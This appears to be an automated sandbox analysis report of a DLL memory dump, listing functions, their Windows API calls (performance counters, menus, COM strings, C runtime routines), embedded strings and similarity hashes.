Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error
String ID:
API String ID: 2162355165-0
Opcode ID: c9fb990436456b6c648c3582f9b1e0622ef57a783e82480b75838650af35106f
Instruction ID: 5e0c8668a0fa95112c784d6b95f71e8c9538d104fc3e372c80f9c84be5c41b9f
Opcode Fuzzy Hash: c9fb990436456b6c648c3582f9b1e0622ef57a783e82480b75838650af35106f
Instruction Fuzzy Hash: 5DF030F140054DEEFB01DFE5CE18FAEB6ACEB04614F10091CEA14BAA95C7346506C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E09C0, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6E7DB2A0: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,972AE1C9,00000000,?), ref: 6E7DB30E

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6E7E0A17
PdhRemoveCounter.PDH(?,?,00000000), ref: 6E7E0AB3
PdhCloseQuery.PDH(?,?,00000000), ref: 6E7E0AC8

Strings

edit, xrefs: 6E7E0A10
0, xrefs: 6E7E0B77

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: 7384e55e19d070d0ab48edf9064494b5485d2eb4e831fe8ea8c461a7a1789678
Instruction ID: cfb309e12e599698069c9ac5d8004697b00c2ca01a59ec83b0b2268755b6ffd2
Opcode Fuzzy Hash: 7384e55e19d070d0ab48edf9064494b5485d2eb4e831fe8ea8c461a7a1789678
Instruction Fuzzy Hash: C7A138716003068FD304CF68CA95B9AB7A5FF85318F104A1CE9559BAB1EB32F985CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FC6E1, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E7FC869

Strings

*?, xrefs: 6E7FC722
., xrefs: 6E7FCA72

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 56b8108a8e6e81758a6e44a9f0b24d166001932c6213a47b12974f263f32d42e
Instruction ID: 8af81aa8e05b4cf1787d4e594bc1fcbc12470249fbd259435f94171d7958af8b
Opcode Fuzzy Hash: 56b8108a8e6e81758a6e44a9f0b24d166001932c6213a47b12974f263f32d42e
Instruction Fuzzy Hash: B3613A76D04119DFDB04CFE8C9804EDFBF9EF48314B25456AD855AB314E731AE428BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1F70, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D206D

Part of subcall function 6E7E8B67: RaiseException.KERNEL32(?,?,6E7E5B36,000000FF,00000000,00000000,24448D6E,?,?,?,?,6E7E5B36,000000FF,6E81BC44,?,000000FF), ref: 6E7E8BC7

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D20B2
___std_exception_copy.LIBVCRUNTIME ref: 6E7D20DF

Strings

ios_base::failbit set, xrefs: 6E7D1F85
ios_base::badbit set, xrefs: 6E7D2077, 6E7D20A2, 6E7D20C3

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-1240500531
Opcode ID: e6f888e6c72ecc70d7556f060a790e3e13b606006faa56e4a5b824e368906bbc
Instruction ID: fc5d9fdfb0a78003a83d1d13104e8ec51e7a2deb1764b44915492f69aef9effe
Opcode Fuzzy Hash: e6f888e6c72ecc70d7556f060a790e3e13b606006faa56e4a5b824e368906bbc
Instruction Fuzzy Hash: 9E41B3B1A04209AFD704CFE8DD44BDEB7BCEF45310F148A2AE554D7650E771A949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E1230, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6E7E125A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6E7E126E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6E7E1282

Strings

Performance Monitor - (Reload Configuration), xrefs: 6E7E125C
Performance Monitor - (Edit Configuration), xrefs: 6E7E1270

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: 43ddef41c940742e5f8b7698f967502a4a7c6cdeb8b85ade5737166a5eefaa3a
Instruction ID: 6b49968ec2e17a6dfb08186ee233ccc8f62cceefbf57d99b759f08287474f782
Opcode Fuzzy Hash: 43ddef41c940742e5f8b7698f967502a4a7c6cdeb8b85ade5737166a5eefaa3a
Instruction Fuzzy Hash: D9F0B43314024D7BEB01DE849C80FBB7B6CEB49710F044416FB049A181C371A921DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F6100, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E7F60B1,6E7F6079), ref: 6E7F6120
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E7F6133
FreeLibrary.KERNEL32(00000000,?,?,?,6E7F60B1,6E7F6079), ref: 6E7F6156

Strings

CorExitProcess, xrefs: 6E7F612B
mscoree.dll, xrefs: 6E7F6119

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 43956fec855156fe6e91d2340933703833a00c8fab575d94cfecfcce088cc9e3
Instruction ID: b15d134d6de2187c1c5cc422ee1e261b4134192e5506363a7213ab87c4b37170
Opcode Fuzzy Hash: 43956fec855156fe6e91d2340933703833a00c8fab575d94cfecfcce088cc9e3
Instruction Fuzzy Hash: 49F04F31A1061DFBDF019FD0CC18B9EBFB8EF0A251F0000A8E809A6251DB358A42CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FE402, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9112cfc7d0c89c99eba1f2f0461d9b77ede78e4df89fd6dcdd0e536ba260c04c
Instruction ID: 6698e2e82f8ad36e0bcf43e32a326e2cf4eca912202a205b889468522960bd41
Opcode Fuzzy Hash: 9112cfc7d0c89c99eba1f2f0461d9b77ede78e4df89fd6dcdd0e536ba260c04c
Instruction Fuzzy Hash: 6D719B7190021EDBDB618ED9CA84AAABB75EF42330F100679E421973A4DB70D943DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E3920, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,972AE1C9,?,?,00000000,6E80956B,000000FF,?,6E7E0C1F,00000000), ref: 6E7E3973
PdhCloseQuery.PDH(?,972AE1C9,?,?,00000000,6E80956B,000000FF,?,6E7E0C1F,00000000), ref: 6E7E399E
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 6E7E39C2
PdhValidatePathW.PDH(?), ref: 6E7E3A1E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 6E7E3A4A

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: 94b7266c64984fb638afda9e0d5b5909c7b1fd5460bf1d8f0eb8b2daec62ae82
Instruction ID: f7b08652618b52a75ace3809fd966f0501d90a531251100d38af96aa632ccf02
Opcode Fuzzy Hash: 94b7266c64984fb638afda9e0d5b5909c7b1fd5460bf1d8f0eb8b2daec62ae82
Instruction Fuzzy Hash: 5C51D171900259AFDB20CF54CE48BDAB7B8FF44314F0085AAE45DAB660D775AAC5CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F67CB, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E7F683D
_free.LIBCMT ref: 6E7F685D

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e2933f2667e9b52da824f237385479dbe9792b0507c03ccd82a6c55b07dfac7f
Instruction ID: 5ba3a942f6ffcce162349a9b8933f6367e96abcf941c48bf4efd0f6eff8993b3
Opcode Fuzzy Hash: e2933f2667e9b52da824f237385479dbe9792b0507c03ccd82a6c55b07dfac7f
Instruction Fuzzy Hash: AF41D132A10204DFDB14DFF8C984A99B7BAEF89314B15456CE515EB361D731AA02CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D4A90, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E7D4ACC
std::_Lockit::_Lockit.LIBCPMT ref: 6E7D4AEE
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D4B0E
std::_Facet_Register.LIBCPMT ref: 6E7D4BDF
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D4BFF

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 6e6de62897e4aa8f50d4e1f7a10391185377c0fab2a94739c2c0fa22a08231cf
Instruction ID: b65739b4c99ce71bb88103a0d362aa4ceadae0f440254ccb57af40d44b98e17d
Opcode Fuzzy Hash: 6e6de62897e4aa8f50d4e1f7a10391185377c0fab2a94739c2c0fa22a08231cf
Instruction Fuzzy Hash: 5951CE70904609CFCB50CFD8CA44B9EB7B8FF55718F10852DD809AB691EB74AA4ACBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FE9FD, Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(24448D6E,00000000,?,00000002,00000000,00000000,00000000,00000000,?,24448D6E,00000001,00000002,?,00000001,00000000,?), ref: 6E7FEA4A
__alloca_probe_16.LIBCMT ref: 6E7FEA82
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E7FEAD3
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E7FEAE5
__freea.LIBCMT ref: 6E7FEAEE

Part of subcall function 6E7F92A2: HeapAlloc.KERNEL32(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: 15f64de05f29015eb3c9f713113343b175289d5c77499e6d0667b232a8bbd2ab
Instruction ID: 8248b3859695d310ed68f17e26e99ad95c6ae67833b83648977150496bd089f8
Opcode Fuzzy Hash: 15f64de05f29015eb3c9f713113343b175289d5c77499e6d0667b232a8bbd2ab
Instruction Fuzzy Hash: 1131AE72A0060AEBDF15CFA5CD54EEE3BA9FF41320B004168EC24D72A0E735D952CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FD3D6, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E7FD3DF
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E7FD402

Part of subcall function 6E7F92A2: HeapAlloc.KERNEL32(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E7FD428
_free.LIBCMT ref: 6E7FD43B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E7FD44A

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: 9212d8cb8bf02f71d93fc8b5b71bc8fd85b8cb92a5de21b949c558de2a6019d0
Instruction ID: d8184dacf75fae41e89620059de9ec7be5051b1c9dc0570d4f7d8f0803d294be
Opcode Fuzzy Hash: 9212d8cb8bf02f71d93fc8b5b71bc8fd85b8cb92a5de21b949c558de2a6019d0
Instruction Fuzzy Hash: AD01B572601615FF6B111EFA5D8CE7B3A6DDEC39A43100128FE04C2310DA619D0399B6

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F9AB2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,6E7F6065,?,6E7F5AFD,6E7F928E,6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9AB7
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9ADD
_free.LIBCMT ref: 6E7F9B1D
_free.LIBCMT ref: 6E7F9B50
SetLastError.KERNEL32(00000000,000000FF), ref: 6E7F9B5D

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: bcaacbb25b1faa3477183f5ddccfcf5beecd2002ee5be24c371c570295808d21
Instruction ID: 1ebb9c447dab9dc37c95d112dfb6d37427c0d8ddcd1b70c1a9190abbbd72f567
Opcode Fuzzy Hash: bcaacbb25b1faa3477183f5ddccfcf5beecd2002ee5be24c371c570295808d21
Instruction Fuzzy Hash: 8211C872114902EA8B02EEF94E48E9B356DEFD23797140B35F52C927B0DF21C907DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E804048, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E804060

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E804072
_free.LIBCMT ref: 6E804084
_free.LIBCMT ref: 6E804096
_free.LIBCMT ref: 6E8040A8

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 654eb65a932cbb53aeda2ff42ed5305605065c4a0ba308d9fefaefc85e36a0b3
Instruction ID: 516336765ca86b1b797dacdb3f5d8f294766b30d71129dfb831ce8c95188db31
Opcode Fuzzy Hash: 654eb65a932cbb53aeda2ff42ed5305605065c4a0ba308d9fefaefc85e36a0b3
Instruction Fuzzy Hash: E7F04F31588609DB8AA4DEE4D985C9673DDBA617103A04D09F019E7E90C730FD81CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7E10, Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E7E7E1C
GetLastError.KERNEL32(?,00000000,?,00000000,8007000E), ref: 6E7E7E21
_com_issue_error.COMSUPP ref: 6E7E7E34
GetLastError.KERNEL32(?,00000000,8007000E), ref: 6E7E7E42
_com_issue_error.COMSUPP ref: 6E7E7E55

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ErrorLast
String ID:
API String ID: 1321852664-0
Opcode ID: 59c09ce0b7be50ae86338f1ee21e7630e0ed9a715b29abede351bf7021fd51cd
Instruction ID: 16d748f4f3f829951381fe4a39736a64b39cc9f7ebbeca1323c122271e174bb3
Opcode Fuzzy Hash: 59c09ce0b7be50ae86338f1ee21e7630e0ed9a715b29abede351bf7021fd51cd
Instruction Fuzzy Hash: E0E08CB090069EA6C600AEF00A0CBAE225C5B02624B204E58E05CE49F1DB28C10B9AB9

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F61A4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E7F61E7, 6E7F61EE, 6E7F6222

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 81f2e22f343ea5071479ee6095a909c653363da9b203faa3b1221ec0be87c6d0
Instruction ID: 8cf9ee449ae3093cd00e5fef62fe7114b7841367ec9d53a65caa782cb975fb87
Opcode Fuzzy Hash: 81f2e22f343ea5071479ee6095a909c653363da9b203faa3b1221ec0be87c6d0
Instruction Fuzzy Hash: 09418471A14215EFDB11DFD9CA849DEBBBCEF8A310B1045A6E91497360EB708B42CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F9C8B, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E7F9D12

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 30daa00f9ed7ea23be0689d122243d6d7c7171fafba721b1ad2257128bfc374a
Instruction ID: 715ed677e39b80fca6c2451f69c2f342d901949ca9432e1dfd84eb4d2d81b58a
Opcode Fuzzy Hash: 30daa00f9ed7ea23be0689d122243d6d7c7171fafba721b1ad2257128bfc374a
Instruction Fuzzy Hash: F3B13732D45287DFE712CFE8C960BAEBBA4EF62354F1446AAD4405B3A1C3359942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D85E0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6E7D8611

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 3cc6b1ee5287aac4b81644ab89c261c9cf131cf66a4ec9d73efc3e82ce95b165
Instruction ID: 07dd9a924f2b012a115dd8ba40ab4e66b0eed2d0c6081eb08d4dd9e39c8bf3d9
Opcode Fuzzy Hash: 3cc6b1ee5287aac4b81644ab89c261c9cf131cf66a4ec9d73efc3e82ce95b165
Instruction Fuzzy Hash: E231DB32B052158BEF08CDADE59556EBBE4EF45770B1092BEEC15C7258EB31D850CAC4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D84A0, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 6E7D84FE
SysAllocString.OLEAUT32(?), ref: 6E7D8569
_com_issue_error.COMSUPP ref: 6E7D85A5
_com_issue_error.COMSUPP ref: 6E7D85AF

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: c0f2df346da2031eaa3fb95badbe99b683c4fa98ddb7f0ba185e0e35bbad3652
Instruction ID: 4a4414427970c1c037c3128f73ea24f2d28717d6c6aa3708714cf66a07e0ccbb
Opcode Fuzzy Hash: c0f2df346da2031eaa3fb95badbe99b683c4fa98ddb7f0ba185e0e35bbad3652
Instruction Fuzzy Hash: 2531D871A00706DBF7608FD5CA44756B7E8EF01710F10463AE865D7690E774D545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D8390, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6E7D83F0
_com_issue_error.COMSUPP ref: 6E7D842C
_com_issue_error.COMSUPP ref: 6E7D8436
SysFreeString.OLEAUT32(-00000001), ref: 6E7D8464

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: bffab10c40af0f78212612289059db1e1883190146c8be71d786aa9442f8b269
Instruction ID: 1951ce57212490d6de344bc2094533a8cf680a554511b7b7723f655d4126bc1e
Opcode Fuzzy Hash: bffab10c40af0f78212612289059db1e1883190146c8be71d786aa9442f8b269
Instruction Fuzzy Hash: 3931D7719017169BE7218F99C904B5BB7ECEF01B20F10862EEC64A7790E7B4D846CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E28F0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E28FC
GetCurrentThreadId.KERNEL32 ref: 6E7E290C
LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E293C
SetWindowLongW.USER32(?,000000FC,00000000), ref: 6E7E298F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
